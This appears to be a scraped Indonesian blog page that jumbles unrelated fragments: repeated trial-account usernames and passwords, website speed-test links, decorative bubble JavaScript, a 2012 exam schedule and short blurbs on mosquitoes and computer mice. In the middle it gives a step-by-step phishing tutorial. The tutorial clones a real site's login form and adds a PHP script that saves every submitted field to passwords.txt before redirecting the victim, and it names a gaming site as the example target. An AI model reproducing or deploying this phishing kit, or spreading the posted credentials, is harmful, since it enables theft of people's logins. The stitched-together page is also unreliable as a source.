Username: TRIAL-59062879
Password: nda7najxtj
Username: TRIAL-59062972
Password: n4pe86p54k
Username: TRIAL-59062983
Password: ds68cxa2nm
Username: TRIAL-59062884
Password: evf6br6jkn
Username: TRIAL-59062977
Password: a4p5pnm765
Komunitas Indonesia
The KinG Of Fire
The KinG Of Fire
The KinG Of Fire
The KinG Of Fire
The KinG Of Fire
Username: TRIAL-59062879
Password: nda7najxtj
Username: TRIAL-59062972
Password: n4pe86p54k
Username: TRIAL-59062983
Password: ds68cxa2nm
Username: TRIAL-59062884
Password: evf6br6jkn
Username: TRIAL-59062977
Password: a4p5pnm765
To measure the size of the blog and find out when loading a blog could use some service sites that provide free facilities to measure the weight / loading our blog
- http://www.iwebtool.com/
- http://tools.pingdom.com/
- http://www.numion.com/Stopwatch/
- http://websiteoptimization.com/services/analyze/
- http://internetsupervision.com/
- http://www.webslug.info/
- http://www.octagate.com/service/SiteTimer/
- http://site-perf.com/
- http://www.linkvendor.com/seo-tools/speedtester.html
- http://www.uptrends.com/aspx/free-html-site-page-load-check-tool.aspx
- http://webwait.com/
Tutorial How to manually
~ You must have a domain & hosting
~. select the target site which would dijadiin phishing page
~. view the source code, right click => ctrl + source can also u then save so index.htm
~. which was open index.html pake notepad, search the word "action =" gini rich who usually meet
<form action="RANDOM URL" method="post">
~. replace url "RANDOM URL" so write.php now change "post" so get
~. save
~. make "write.php"
<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
~. instead of writing the above reply so http://RANDOM which address such diphising http://gemscool.com
~. save
~. upload deh in the same directory ...
| [[196920740401785]] - A |
|---|
| [[113544575430999]] - B |
| [[294715893904555]] - C |
| [[294660140569858]] - D |
| [[328415510520892]] - E |
| [[270221906368791]] - F |
| [[212614922155016]] - G |
| [[205633882856736]] - H |
| [[256255337773105]] - I |
| [[288138264570038]] - J |
| [[296999947008863]] - K |
| [[216672855078917]] - L |
| [[278786215503631]] - M |
| [[241341589270741]] - N |
| [[312524205448755]] - O |
| [[200138403410055]] - P |
| [[165410113558613]] - Q |
| [[203403609746433]] - R |
| [[334427926570136]] - S |
| [[250632158335643]] - T |
| [[285985351447161]] - U |
| [[343627398996642]] - V |
| [[315740851791114]] - W |
| [[136342506479536]] - X |
| [[224173507657194]] - Y |
| [[317710424919150]] - Z |
__________________________________________________________________________________<noscript></noscript><!-- --><script type="text/javascript" src="http://www.freewebs.com/p.js"></script><script type="text/javascript">
// <![CDATA[
var colours=new Array("#F781BE", "#F781BE", "#F781BE", "#F781BE", "#F781BE"); // colours for top, right, bottom and left borders and background of bubbles
var bubbles=100; // maximum number of bubbles on screen
var x=ox=400;
var y=oy=300;
var swide=800;
var shigh=600;
var sleft=sdown=0;
var bubb=new Array();
var bubbx=new Array();
var bubby=new Array();
var bubbs=new Array();
window.onload=function() { if (document.getElementById) {
var rats, div;
for (var i=0; i<bubbles; i++) {
rats=createDiv("3px", "3px");
rats.style.visibility="hidden";
div=createDiv("auto", "auto");
rats.appendChild(div);
div=div.style;
div.top="1px";
div.left="0px";
div.bottom="1px";
div.right="0px";
div.borderLeft="1px solid "+colours[3];
div.borderRight="1px solid "+colours[1];
div=createDiv("auto", "auto");
rats.appendChild(div);
div=div.style;
div.top="0px";
div.left="1px";
div.right="1px";
div.bottom="0px"
div.borderTop="1px solid "+colours[0];
div.borderBottom="1px solid "+colours[2];
div=createDiv("auto", "auto");
rats.appendChild(div);
div=div.style;
div.left="1px";
div.right="1px";
div.bottom="1px";
div.top="1px";
div.backgroundColor=colours[4];
div.opacity=0.5;
if (document.all) div.filter="alpha(opacity=50)";
document.body.appendChild(rats);
bubb[i]=rats.style;
}
set_scroll();
set_width();
bubble();
}}
function bubble() {
var c;
if (x!=ox || y!=oy) {
ox=x;
oy=y;
for (c=0; c<bubbles; c++) if (!bubby[c]) {
bubb[c].left=(bubbx[c]=x)+"px";
bubb[c].top=(bubby[c]=y)+"px";
bubb[c].width="3px";
bubb[c].height="3px"
bubb[c].visibility="visible";
bubbs[c]=3;
break;
}
}
for (c=0; c<bubbles; c++) if (bubby[c]) update_bubb(c);
setTimeout("bubble()", 40);
}
function update_bubb(i) {
if (bubby[i]) {
bubby[i]-=bubbs[i]/2+i%2;
bubbx[i]+=(i%5-2)/5;
if (bubby[i]>sdown && bubbx[i]>0) {
if (Math.random()<bubbs[i]/shigh*2 && bubbs[i]++<8) {
bubb[i].width=bubbs[i]+"px";
bubb[i].height=bubbs[i]+"px";
}
bubb[i].top=bubby[i]+"px";
bubb[i].left=bubbx[i]+"px";
}
else {
bubb[i].visibility="hidden";
bubby[i]=0;
return;
}
}
}
document.onmousemove=mouse;
function mouse(e) {
set_scroll();
y=(e)?e.pageY:event.y+sleft;
x=(e)?e.pageX:event.x+sdown; }
window.onresize=set_width;
function set_width() {
if (document.documentElement && document.documentElement.clientWidth) {
swide=document.documentElement.clientWidth;
shigh=document.documentElement.clientHeight;
}
else if (typeof(self.innerHeight)=="number") {
swide=self.innerWidth;
shigh=self.innerHeight;
}
else if (document.body.clientWidth) {
swide=document.body.clientWidth;
shigh=document.body.clientHeight;
}
else {
swide=800;
shigh=600;
}
}
window.onscroll=set_scroll;
function set_scroll() {
if (typeof(self.pageYOffset)=="number") {
sdown=self.pageYOffset;
sleft=self.pageXOffset;
}
else if (document.body.scrollTop || document.body.scrollLeft) {
sdown=document.body.scrollTop;
sleft=document.body.scrollLeft;
}
else if (document.documentElement && (document.documentElement.scrollTop || document.documentElement.scrollLeft)) {
sleft=document.documentElement.scrollLeft;
sdown=document.documentElement.scrollTop;
}
else {
sdown=0;
sleft=0;
}
}
function createDiv(height, width) {
var div=document.createElement("div");
div.style.position="absolute";
div.style.height=height;
div.style.width=width;
div.style.overflow="hidden";
return (div);
}
// ]]>
</script>
| No | EDUCATION LEVEL | TIME OF UNAS | DETERMINATION graduation | |
| MAIN | continuation | |||
| 1 | SMA / MA and SMK | 16 to 19 April 2012 | 23 to 26 April 2012 | May 24, 2012 |
| 2 | SMP / MTs and SMPLB | 23 to 26 April 2012 | 30 April to 4 May 2012 | June 2, 2012 |
| 3 | SD / MI AND SDLB | 7 to 9 May 2012 | 14 to 16 May 2012 | authority of the Province |




Mungkin
banyak di antara kita yang menganggap nyamuk sebagai serangga yang
biasa saja, atau bahkan menjengkelkan karena suka mengganggu orang
tidur. akan tetapi sob nyamuk memiliki fakta yang luar biasa dan
mengagumkan. Nyamuk yang kita kenal sehari-sehari ternyata memiliki
keunikan yang jarang atau bahkan kita tidak tau. Mau kenal lebih dekat
dengan nyamuk? yuk kita bahas!



manusia emang gak ada habisnya buat menciptakan sesuatu yang keren sob, salah satunya adalah mouse komputer, ternyata di dunia ini ada 10 mouse komputer paling keren yang pernah di buat. Pas gw liat tenyata emang bener-bener keren sob dan kayaknya perlu sobat tau buat nambah pengetahuan hehehe~~ nah biar sobat bisa kenali mouse komputer paling keren di dunia silahkan lanjut bacanya juragan!








